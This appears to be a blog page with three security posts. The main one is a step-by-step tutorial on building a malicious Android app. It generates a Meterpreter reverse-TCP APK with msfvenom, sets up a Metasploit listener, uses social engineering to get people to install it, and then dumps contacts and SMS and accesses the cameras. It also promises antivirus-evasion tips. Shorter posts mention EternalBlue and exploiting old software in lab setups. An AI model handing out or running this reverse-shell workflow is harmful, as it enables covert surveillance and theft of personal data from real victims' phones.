How To Create a Malicious App for Android

So, recently got interested in how secure Android apps are and how I could learn a bit more about them. The best way to learn? Create my own malicious App!

What else would we use other than Metasploit?

So we fire up the console like so…

service postgresql start

msfconsole

First we need to create the malicious .apk file, so open another Terminal Window and use the following making sure you enter your IP and port number after the “=” symbols.

msfvenom -p android/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=xxxx -o malicious.apk

You can name the app whatever you like using the “-o” switch. There are also other options you can specify but we will keep it simple for now.

In the first Window running Metasploit we now start a handler which will “listen” for when our app is installed and used which launches the connection attempt. We do this like so.

use exploit/multi/handler

Then we need to set IP, Port and Payload.  The port and IP need to be the same set in the previous steps when using msfvenom

set LHOST xx.xx.xx.xx

set LPORT xxxx

set PAYLOAD android/meterpreter/reverse_tcp

We can check what is required for an exploit at any time once it is loaded by running

show options

We have everything we need now configured so we can start the “listener”

run

Then we use social engineering to try and get someone to install and run it.

When they do you will the connection come back from the phone.

In this example we got 2 connections! We can list them with this command

sessions -i

We can then connect by using the same command but choosing which session we want to connect to.

sessions 1

And then quickly get some info to confirm the device.

sysinfo

Then we can quickly dump info from the phone imediately using the dump commands

dump_contacts

dump_sms

You can also capture a screen shot, take a photo front either camera, or even stream live from either camera on the device. Scary huh?

If you have NO anti Virus on your Android, and you have disabled the “verify app” feature then this simple app will run without any issues.

If you have an Android phone, enable the app verifier, and get some anti virus to at least give yourself a fighting chance!

There will be a follow up to this post as there are tools we can use to make our malicious apps look better and be less likely to be blocked by anti virus. That’s it for now though.

Eternal Blue Scan and Exploit Demo

It’s everywhere at the moment. ms17_010 or Eternal Blue as it’s affectionately known. It’s another great example of why it’s so important to not only keep your Anti Virus solution up to date, but also to install the latest patches for your OS.  This exploit requires just 2 things. That the port is open and that the required patch is not installed. In this demonstration we are attacking Windows Server 2008, setup using the Metasploitable 3 script from this project https://github.com/rapid7/metasploitable3

You can see that both the scanner and the exploit are built right into Metasploit and they are very easy to use. Patch your machines, Even if you think you can’t set up a test environment and try. Make good backups, and check that they work. Enjoy the video.

If you wanna setup Metasploitable 3 you need to do a bit of legwork, it doesn’t just work out of the box like it’s predecessor, and you need to install some prerequisites. The guides I used are here http://www.prodefence.org/2017/06/setup-metasploitable-3-windows-10/ and here  https://www.youtube.com/watch?v=i_K2cZcTXeI&t=580s

 

 

Check for and uninstall old software

You keep your PC up to date with the latest patches, and run a good Anti-Virus solution, you must be safe right? Have you got old software installed that you don’t use anymore or have forgotten about? Old, discontinued or out of date software can leave a wide open hole into your network. This video shows a port scan and quick exploit of some old software installed on a PC which should have been uninstalled years ago.